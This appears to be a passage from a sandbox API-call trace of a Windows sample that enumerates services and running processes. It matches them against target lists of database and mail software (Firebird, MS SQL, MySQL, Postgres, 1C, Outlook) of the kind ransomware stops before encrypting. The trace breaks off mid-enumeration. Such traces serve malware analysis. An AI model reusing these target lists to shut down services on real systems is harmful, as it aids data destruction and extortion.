[0053.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0053.189] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0053.189] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0053.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0053.189] lstrlenW (lpString="EventSystem") returned 11 [0053.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.189] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.189] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.189] lstrlenW (lpString="gpsvc") returned 5 [0053.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.189] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.189] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.189] lstrlenW (lpString="iphlpsvc") returned 8 [0053.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.189] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.189] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.189] lstrlenW (lpString="LanmanServer") returned 12 [0053.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.189] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.189] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.189] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.190] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.190] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.190] lstrlenW (lpString="lmhosts") returned 7 [0053.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.190] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.190] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.190] lstrlenW (lpString="MMCSS") returned 5 [0053.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0053.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0053.190] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0053.190] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0053.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0053.190] lstrlenW (lpString="MpsSvc") returned 6 [0053.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.190] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.190] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.190] lstrlenW (lpString="Netman") returned 6 [0053.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0053.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0053.190] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0053.190] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0053.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0053.190] lstrlenW (lpString="netprofm") returned 8 [0053.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.190] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.190] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.190] lstrlenW (lpString="NlaSvc") returned 6 [0053.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.191] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.191] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.191] lstrlenW (lpString="nsi") returned 3 [0053.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.191] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.191] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.191] lstrlenW (lpString="PcaSvc") returned 6 [0053.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.191] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.191] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.191] lstrlenW (lpString="PlugPlay") returned 8 [0053.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.191] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.191] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.191] lstrlenW (lpString="Power") returned 5 [0053.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.191] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.191] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.191] lstrlenW (lpString="ProfSvc") returned 7 [0053.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.191] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.191] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.192] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.192] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.192] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.192] lstrlenW (lpString="RpcSs") returned 5 [0053.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.192] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.192] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.192] lstrlenW (lpString="SamSs") returned 5 [0053.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.192] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.192] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.192] lstrlenW (lpString="Schedule") returned 8 [0053.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.192] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.192] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.192] lstrlenW (lpString="SENS") returned 4 [0053.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.192] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.192] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.192] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.192] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.192] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.193] lstrlenW (lpString="Spooler") returned 7 [0053.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.193] lstrlenW (lpString="swprv") returned 5 [0053.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0053.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0053.193] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0053.193] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0053.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0053.193] lstrlenW (lpString="SysMain") returned 7 [0053.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.193] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.193] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.193] lstrlenW (lpString="Themes") returned 6 [0053.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0053.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0053.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0053.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0053.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0053.193] lstrlenW (lpString="TrkWks") returned 6 [0053.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0053.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0053.193] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0053.193] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0053.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0053.193] lstrlenW (lpString="UxSms") returned 5 [0053.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0053.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0053.193] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0053.194] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0053.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0053.194] lstrlenW (lpString="VSS") returned 3 [0053.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0053.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0053.194] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0053.194] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0053.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0053.194] lstrlenW (lpString="WdiServiceHost") returned 14 [0053.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.194] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0053.194] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0053.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0053.194] lstrlenW (lpString="WdiSystemHost") returned 13 [0053.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.194] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0053.194] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0053.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0053.194] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0053.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.194] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0053.194] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0053.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0053.194] lstrlenW (lpString="Winmgmt") returned 7 [0053.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0053.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0053.194] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0053.194] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0053.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0053.194] lstrlenW (lpString="WPDBusEnum") returned 10 [0053.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.195] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0053.195] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0053.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0053.195] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f740a8 | out: hHeap=0x570000) returned 1 [0053.195] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0053.199] Process32FirstW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.199] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.200] lstrlenW (lpString="System") returned 6 [0053.200] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0053.200] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0053.200] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0053.200] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0053.200] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0053.200] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0053.200] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0053.200] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.201] lstrlenW (lpString="smss.exe") returned 8 [0053.201] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0053.201] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0053.201] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0053.201] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0053.201] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0053.201] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0053.201] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0053.201] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.202] lstrlenW (lpString="csrss.exe") returned 9 [0053.202] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0053.202] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0053.202] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0053.202] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0053.202] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0053.202] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0053.202] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0053.202] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.203] lstrlenW (lpString="wininit.exe") returned 11 [0053.203] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0053.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0053.203] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0053.203] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.204] lstrlenW (lpString="csrss.exe") returned 9 [0053.204] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.205] lstrlenW (lpString="winlogon.exe") returned 12 [0053.205] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.205] lstrlenW (lpString="services.exe") returned 12 [0053.205] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.206] lstrlenW (lpString="lsass.exe") returned 9 [0053.206] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0053.207] lstrlenW (lpString="lsm.exe") returned 7 [0053.207] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.207] lstrlenW (lpString="svchost.exe") returned 11 [0053.207] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.208] lstrlenW (lpString="svchost.exe") returned 11 [0053.208] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.209] lstrlenW (lpString="svchost.exe") returned 11 [0053.209] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.210] lstrlenW (lpString="svchost.exe") returned 11 [0053.210] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.210] lstrlenW (lpString="svchost.exe") returned 11 [0053.210] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.211] lstrlenW (lpString="audiodg.exe") returned 11 [0053.211] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.212] lstrlenW (lpString="svchost.exe") returned 11 [0053.212] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.212] lstrlenW (lpString="svchost.exe") returned 11 [0053.212] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.213] lstrlenW (lpString="dwm.exe") returned 7 [0053.213] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.214] lstrlenW (lpString="explorer.exe") returned 12 [0053.214] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.214] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.215] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.215] lstrlenW (lpString="taskhost.exe") returned 12 [0053.215] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, 